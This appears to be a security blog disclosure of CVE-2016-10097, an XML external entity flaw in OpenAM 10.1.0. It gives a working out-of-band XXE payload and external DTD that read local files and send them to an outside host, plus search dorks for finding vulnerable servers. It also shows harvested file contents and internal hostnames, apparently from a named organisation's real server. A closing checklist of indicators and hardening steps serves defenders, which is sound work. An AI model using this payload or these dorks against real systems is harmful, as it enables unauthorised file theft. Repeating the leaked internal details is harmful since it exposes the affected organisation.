CVE-2016-10097 – See Also Indicators of Compromise
DORK: “Copyright © 2010 ForgeRock AS, Philip Pedersens vei 1, 1366 Lysaker, Norway”
XML External Entity (XXE) Vulnerability in /SSOPOST/metaAlias/%realm%/idpv2 in OpenAM – Access Management 10.1.0 allows remote attackers to read arbitrary files via the SAMLRequest parameter.
XXE Proof of Concept (PoC) Code for Exploit against Open AM 10.1.0 at the SAML Request Parameter via /SSOPOST/metaAlias/%realm%/idpv2
|The Code for CVE-2016-10097|
CVE-2016-10097, XML Injection, XXE, Open AM 10.1
<!DOCTYPE data SYSTEM “http://xss.cx/openam101.dtd”><data>&send;</data>
Contents of openam101.dtd:
<!ENTITY % file SYSTEM “file:///proc/meminfo”>
<!ENTITY % all “<!ENTITY send SYSTEM ‘http://xss.cx/?%file;’>”>
cpu 419311965 4958 41906219 5571468847 1211462 8047 3780040 0 0
cpu0 103233830 1190 8362638 1396465878 301560 1975 552107 0 0
cpu1 102848677 1225 8610282 1397505613 324501 2071 519396 0 0
cpu2 111458378 1316 16816343 1378419372 283117 2061 2203759 0 0
cpu3 101771078 1225 8116954 1399077982 302283 1939 504776 0 0
softirq 21376324649 0 1786417168 3049727 3740787123 46379118 0 4661 668387188
Open Source Software Exploits can often be identified via a well crafted DORK (1) inurl:SSOPOST OR (2) (X-DSAME Version: Release 9.5.1 Build 9.5.1(2010-November-04 13:03).
Any SSO Provider using an old, out-of-date version of OPEN AM 10.1.0 has an Exploitable SSO based on a simple DORK Search. Sensitive Information is available via XXE!
|OPEN AM V10.1 DORK: “Copyright © 2010 ForgeRock AS, Philip Pedersens vei 1, 1366 Lysaker, Norway“|
CV InfoSec Team – You had 1 Job
The SAMLRequest parameter is vulnerable to XML external entity injection at /SSOPOST/metaAlias/%realm%/idpv2
First Issue: Contents of /etc/issue – Red Hat Enterprise Linux Server release 6.6 (Santiago)
Comments: Best to look for a new job outside of InfoSec
Second Issue: Listing of /etc/motd – All activity on this system is subject to monitoring. If information collected reveals possible activity that exceeds privileges, evidence of such activity will be used for further action. By continuing past this point, you expressly consent to this monitoring.
Comments: No one is monitoring this VM or e-mail to security@
Third Issue: Contents of /tmp:
Contents of /tmp/LogProcessor.out
06:00:01 [WARN] – Using db.host: ora1tacap.srv.hcvlny.cv.net
06:00:01 [WARN] – Processing log file: /cust/apache/logs/atmail-reporting.log
06:00:01 [WARN] – Copying to temp file: /tmp/atmail-reporting.log.20160316-0600687904557808202862.log
06:00:01 [ERROR] – Could not read the reporting log
java.io.FileNotFoundException: /cust/apache/logs/atmail-reporting.log (No such file or directory)
at java.io.FileInputStream.open(Native Method)
06:00:01 [WARN] – Wrote buffer: 0 in 93 millis
06:00:01 [WARN] – Completed.
Comments: Serving your /tmp Directory to an HTTP Post isn’t the desired outcome, you’re doing it all wrong.
Issue Four: Contents of /etc/shells
Comments: BASH is our favorite shell but you probably didn’t expect your bash_history being served over HTTP did you?
Issue Five: You left all the default files available from the Install
|Open AM 10.1 Configuration Wizard|
|OPEN AM Version 10.1.0 Default Admin Page at Installation|
Comments: There is no Scanner that can perform proper XXE to get the Keys to the Kingdom automagically. XML Injection done properly is all manual. You’ll need to update SessionID’s, Cookies and other HTTP Headers. Within the SAML, the XML will contain URI and custom resources that will need to be massaged by hand. Don’t push out a huge signature with a Scanner. Even if you get a Bite on XXE in Burp, you’ll need to sit down and do the Exploration and Harvesting by Hand with Burp Repeater and the Command Line, look at the pictures of what can be Harvested below.
XXE IoC’s for InfoSec Teams
1. IS your Server Patched and Up To Date?
2. Are you watching Outbound Connections from the XML Parser?
- Port 21, 22, 23, 80, 443, 8080, 8443?
- Are there Established Connections from an XML Host?
- Did you see /etc/passwd in the GET or POST?
3. Have you disabled External Entity Resolution?
- Can an Attacker still reference URI’s?
- What about upgrade history Logs?
|XXE Recon can provide clues to RCE Endpoints. Picture shows JBOSS Web Console recently installed.|
- Do you allow the XML Parser to Serve your ~root/.bash_history too?
|XXE Check for contents of ~root/.bash_history|
- Do you know which Directories an Attacker can Read and Exfiltrate via XXE?
- Can an Attacker abuse Protocol Handlers?
- jar:// too?
- How about those Windows Help Files?
- Or find out where else you auth?
|.bash_history can provide additional clue to the Keys to the Kingdom|
4. Have you sufficient Permissions on the XML Parser and its UID:GID?
- To Prevent File System Scanning?
- To Prevent LAN Scanning?
- To prevent connecting to localhost?
5. Have you Programmatically disallowed for DNS Lookups from your XML Parser?
- By modifying the Source
6. Have you recently performed a Manual Engagement with an XML Parser that includes Fuzzing?
(If you’ve answered ‘NO’ to these Questions, its time to look for another Job)
That’s all for today folks!
MS16-035 made Breaking Changes:
External references disabled by default
XPath Transform disabled by default
XSLT Transform disabled by default